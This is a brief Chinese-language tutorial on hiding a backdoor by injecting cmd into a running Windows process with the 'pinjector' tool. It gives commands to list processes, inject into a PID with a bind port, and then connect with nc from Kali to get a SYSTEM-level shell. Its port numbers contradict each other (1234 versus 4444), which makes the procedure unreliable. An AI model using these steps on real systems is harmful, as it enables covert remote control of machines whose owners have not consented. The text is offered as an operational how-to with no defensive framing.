目录
简介
通过进程注入不会创建新的进程,隐蔽性比较高,可以通过"pinjector"工具实现进程注入
工具下载地址
工具使用方法
- pinjector.exe -l 查看可利用的进程
- pinjector.exe -p pid cmd port 对pid进程执行注入,并建立侦听端口
实例演示
1.运行以下命令,查看当前进程,以及进程权限。
- pinjector.exe -l
2.指定某个进程的pid 然后将cmd注入到其中,同时开启侦听窗口1234。
- pinjector.exe -p 1284 cmd 1234
3.使用kali中的nc去连接目标服务器的4444端口,获取system权限的shell。
- nc -nv 192.168.31.132 4444